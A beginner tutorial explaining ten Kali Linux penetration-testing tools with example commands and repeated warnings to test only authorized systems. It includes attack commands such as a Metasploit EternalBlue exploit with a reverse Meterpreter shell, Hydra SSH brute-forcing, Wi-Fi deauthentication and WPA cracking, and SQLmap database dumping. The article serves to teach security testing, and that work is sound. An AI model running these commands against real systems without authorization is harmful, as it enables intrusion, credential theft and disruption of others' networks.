Kali Linux Tools for Beginners: 10 Essential Hacking Tools Explained
Kali Linux ships with over 600 security tools, and that sheer volume can be paralyzing for anyone just getting started. The good news is that professional penetration testers rely on a surprisingly small core set of tools for the vast majority of their work. Master these ten, and you will have the foundation to handle real-world security assessments, participate in Capture the Flag competitions, and begin building a career in ethical hacking.
Before diving in, a critical point: every tool described in this guide is legal to install and learn, but using any of them against systems you do not own or have explicit written authorization to test is a criminal offense in virtually every jurisdiction. Always practice on purpose-built lab environments like HackTheBox, TryHackMe, or your own isolated virtual machines. Authorization is not optional -- it is the line between ethical hacking and a felony.
1. Nmap -- The Network Scanner
Nmap (Network Mapper) is the first tool most penetration testers reach for at the start of an engagement. It discovers live hosts on a network, identifies open ports, determines what services are running on those ports, and can even fingerprint operating systems. If you learn only one tool from this list, make it Nmap.
What it does: Nmap sends specially crafted packets to target hosts and analyzes the responses to build a detailed picture of the network. It supports dozens of scan types, from stealthy SYN scans to comprehensive version detection.
Basic usage example:
nmap -sV -O -oN scan_results.txt 192.168.1.0/24
This command performs a service version scan (-sV) and OS detection (-O) against an entire subnet, saving the results to a text file. For a quicker initial sweep, nmap -sn 192.168.1.0/24 performs a simple ping scan to identify which hosts are alive.
When to use it: At the very beginning of any engagement, during the reconnaissance and enumeration phases. Nmap is also invaluable for verifying firewall rules, checking whether patches have closed previously open ports, and scripting automated checks with its built-in Nmap Scripting Engine (NSE).
2. Wireshark -- The Packet Analyzer
Wireshark captures and displays network traffic at the packet level, giving you a granular view of exactly what is happening on the wire. It is indispensable for understanding protocols, debugging network issues, and analyzing suspicious traffic.
What it does: Wireshark places your network interface into promiscuous mode and captures every packet it sees. You can then filter, search, and reconstruct entire conversations between hosts. It decodes hundreds of protocols automatically, presenting the data in a readable, hierarchical format.
Basic usage example:
Open Wireshark, select your network interface, and start capturing. To filter for HTTP traffic, type http in the display filter bar. To see only traffic to or from a specific host, use ip.addr == 192.168.1.100. To isolate TCP handshakes, try tcp.flags.syn == 1.
When to use it: During network analysis, when you need to verify what data is actually being transmitted (for example, checking whether credentials are sent in plain text), when troubleshooting connectivity issues during a test, or when analyzing a packet capture file provided by a client. Wireshark is also an exceptional learning tool -- capturing traffic while you use other tools helps you understand exactly what those tools are doing under the hood.
3. Burp Suite -- The Web Application Testing Platform
Burp Suite is the industry standard for web application security testing. Its intercepting proxy sits between your browser and the target application, allowing you to inspect, modify, and replay every HTTP request and response.
What it does: At its core, Burp Suite acts as a man-in-the-middle proxy. You configure your browser to route traffic through Burp, and it captures every request. From there, you can manually modify parameters, cookies, and headers before forwarding them to the server. The Community Edition (free) includes the proxy, repeater, decoder, and comparer tools. The Professional Edition adds an automated vulnerability scanner, the intruder tool for fuzzing, and numerous other features.
Basic usage example:
- Start Burp Suite and navigate to the Proxy tab.
- Configure your browser to use
127.0.0.1:8080as its HTTP proxy. - Browse the target application. Each request appears in the HTTP history.
- Right-click a request and send it to Repeater to modify and resend it manually.
- Alter parameters -- for example, change a user ID in a request to see if you can access another user's data.
When to use it: For any web application testing engagement. Burp Suite is your primary workspace for testing authentication, authorization, input validation, session management, and business logic flaws. It is also essential for testing APIs.
4. Metasploit Framework -- The Exploitation Platform
Metasploit Framework is an open-source exploitation platform maintained by Rapid7. It provides a massive library of exploits, payloads, encoders, and auxiliary modules that automate many aspects of penetration testing.
What it does: Metasploit allows you to select an exploit targeting a specific vulnerability, pair it with a payload (the code you want to execute on the target), configure options like target IP and port, and launch the attack. If successful, you get a session (often a Meterpreter shell) on the target machine, giving you extensive post-exploitation capabilities.
Basic usage example:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
This sequence launches the EternalBlue exploit against a target, using a reverse Meterpreter shell as the payload. In practice, you would only use this against a machine you have permission to test and that you have confirmed is vulnerable.
When to use it: During the exploitation phase of a penetration test, after enumeration has identified potential vulnerabilities. Metasploit is also excellent for learning because it provides context about each exploit, including the CVE number, affected versions, and reliability rating.
5. John the Ripper -- The Password Cracker
John the Ripper is a fast, flexible password cracking tool that supports hundreds of hash formats. It is used to test the strength of passwords by attempting to recover plaintext passwords from their hashed representations.
What it does: John takes a file containing password hashes and applies various cracking techniques: dictionary attacks (trying words from a wordlist), rule-based attacks (applying transformations like appending numbers or substituting characters), and brute-force attacks (trying every possible combination). It automatically detects many hash formats, though you can specify the format manually for accuracy.
Basic usage example:
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
This command runs a dictionary attack against the hashes in hashes.txt using the popular RockYou wordlist. To see cracked passwords, run john --show hashes.txt.
When to use it: After obtaining password hashes during a penetration test -- for example, by dumping the SAM database on a Windows machine, extracting /etc/shadow on a Linux system, or capturing hashes via a man-in-the-middle attack. Cracking passwords demonstrates the risk of weak password policies and is a standard part of penetration test reports.
6. Hydra -- The Online Brute-Force Tool
Hydra is an online password attack tool, meaning it attempts to log in to live services by trying different username and password combinations directly against the running service. This is distinct from offline cracking tools like John the Ripper, which work against captured hashes.
What it does: Hydra supports over 50 protocols, including SSH, FTP, HTTP, HTTPS, SMB, RDP, MySQL, PostgreSQL, and many more. It sends actual login attempts to the target service and reports any successful credentials.
Basic usage example:
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.50
This command attempts to brute-force the SSH login for the user "admin" on the target host, trying every password in the RockYou wordlist. The -l flag specifies a single username, while -L would specify a file of usernames. Similarly, -p is for a single password and -P for a wordlist.
When to use it: When testing the strength of authentication on network services. Hydra is commonly used to check for default credentials, weak passwords, and the absence of account lockout mechanisms. Be cautious with this tool -- aggressive brute-forcing can lock out legitimate accounts or trigger intrusion detection systems, so coordinate with the system owner.
7. Aircrack-ng -- The Wireless Security Toolkit
Aircrack-ng is a suite of tools for auditing wireless networks. It can capture wireless traffic, perform deauthentication attacks, and crack WEP and WPA/WPA2 pre-shared keys.
What it does: The Aircrack-ng suite includes several utilities that work together. airmon-ng puts your wireless adapter into monitor mode. airodump-ng captures wireless frames and displays nearby access points. aireplay-ng injects frames to generate traffic or deauthenticate clients. aircrack-ng itself cracks the captured handshake against a wordlist.
Basic usage example:
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
This sequence puts the wireless adapter into monitor mode, identifies target networks, captures a WPA handshake by deauthenticating a connected client, and then attempts to crack the handshake offline.
When to use it: During wireless security assessments. Organizations hire penetration testers to evaluate the security of their wireless infrastructure, including the strength of their WPA2/WPA3 passphrases, the presence of rogue access points, and the effectiveness of wireless intrusion detection systems. Note that you need a wireless adapter that supports monitor mode and packet injection -- not all adapters do.
8. SQLmap -- The SQL Injection Automator
SQLmap automates the detection and exploitation of SQL injection vulnerabilities in web applications. It can identify the injection point, determine the database management system, extract data, and in some cases gain operating system access.
What it does: SQLmap takes a URL with a potentially vulnerable parameter and systematically tests it using a wide variety of SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band. If it confirms an injection point, it can enumerate databases, tables, columns, and dump data.
Basic usage example:
sqlmap -u "http://target.com/page?id=1" --dbs
This command tests the id parameter for SQL injection and, if successful, enumerates all databases on the server. Adding --tables -D database_name lists the tables in a specific database, and --dump -T table_name -D database_name extracts the data.
When to use it: When testing web applications for SQL injection during authorized penetration tests. SQLmap is most effective after you have manually identified a parameter that looks potentially vulnerable -- for example, a page that throws a database error when you append a single quote to a parameter value. Let manual testing guide your use of automated tools, not the other way around.
9. Nikto -- The Web Server Scanner
Nikto is an open-source web server scanner that checks for dangerous files, outdated server software, version-specific problems, and server configuration issues. It is not stealthy -- it generates a large amount of traffic and is easily detected -- but it is thorough and fast.
What it does: Nikto sends thousands of requests to a web server, checking for known vulnerabilities, default files, insecure configurations, and outdated software versions. It checks for things like exposed admin panels, backup files, directory listing enabled, missing security headers, and known vulnerable CGI scripts.
Basic usage example:
nikto -h http://target.com -o results.html -Format htm
This command scans the target web server and saves the results as an HTML report. You can also target specific ports with -p 8080 or scan HTTPS sites with -ssl.
When to use it: Early in the web application testing phase, as an initial sweep to identify low-hanging fruit and areas that warrant deeper investigation. Nikto is best used alongside more thorough tools like Burp Suite rather than as a replacement. Because it is noisy, discuss its use with the client before running it in production environments.
10. Gobuster -- The Directory and File Enumerator
Gobuster brute-forces directories and files on web servers, DNS subdomains, and virtual host names. It helps you discover hidden content that is not linked from the main application but may be accessible and vulnerable.
What it does: Gobuster takes a wordlist of common directory and file names and systematically requests each one from the target server, reporting which paths return valid responses (typically anything other than a 404). This reveals content that attackers might exploit, such as admin panels, configuration files, backup directories, or development endpoints that were never intended to be public.
Basic usage example:
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
This command enumerates directories and files on the target, appending .php, .html, and .txt extensions to each word in the list. The -x flag is important because many interesting files will not be found without the correct extension.
When to use it: During the enumeration phase of web application testing. After identifying a web server with Nmap and running an initial Nikto scan, Gobuster helps you map out the full attack surface by discovering content that is not visible through normal browsing. It is also useful for finding hidden API endpoints, backup files, and administrative interfaces.
Bringing It All Together
These ten tools are not used in isolation -- they form a workflow. A typical penetration test follows a logical progression.
- Reconnaissance and scanning: Use Nmap to discover hosts and services on the network. Use Wireshark to analyze traffic patterns and identify protocols in use.
- Enumeration: Use Gobuster and Nikto to map out web applications. Use Nmap's NSE scripts for deeper service enumeration.
- Vulnerability analysis: Use Burp Suite to probe web applications manually. Use SQLmap to test for injection flaws. Use Nikto results to identify known vulnerabilities.
- Exploitation: Use Metasploit to exploit confirmed vulnerabilities. Use Hydra to test authentication strength. Use Aircrack-ng for wireless assessments.
- Post-exploitation: Use John the Ripper to crack recovered password hashes. Use Metasploit's Meterpreter for privilege escalation and lateral movement.
Each tool fills a specific role, and understanding when and why to use each one is just as important as knowing the syntax.
Legal and Ethical Reminders
It is worth repeating: these tools are powerful, and misusing them carries serious legal consequences. Follow these principles without exception.
- Always obtain written authorization before testing any system. A verbal agreement is not sufficient -- get a signed scope document.
- Stay within scope. If you are authorized to test a web application, do not start scanning the internal network unless that is explicitly included.
- Document everything. Keep detailed logs of every command you run, every scan you perform, and every vulnerability you discover.
- Practice on legal platforms. HackTheBox, TryHackMe, VulnHub, and your own lab environments are the right places to learn. Production systems belonging to others are not.
- Report responsibly. If you discover a vulnerability, report it through proper channels. Never exploit vulnerabilities beyond what is necessary to demonstrate the risk.
Where to Go From Here
The best way to learn these tools is to use them repeatedly in controlled environments. Set up a home lab with virtual machines, work through guided challenges on platforms like TryHackMe, and gradually take on more complex scenarios on HackTheBox. As you gain confidence, consider pursuing certifications like the OSCP, which requires hands-on proficiency with many of these tools.
To learn more, read our free Ethical Hacking textbook -- covering penetration testing from beginner to advanced.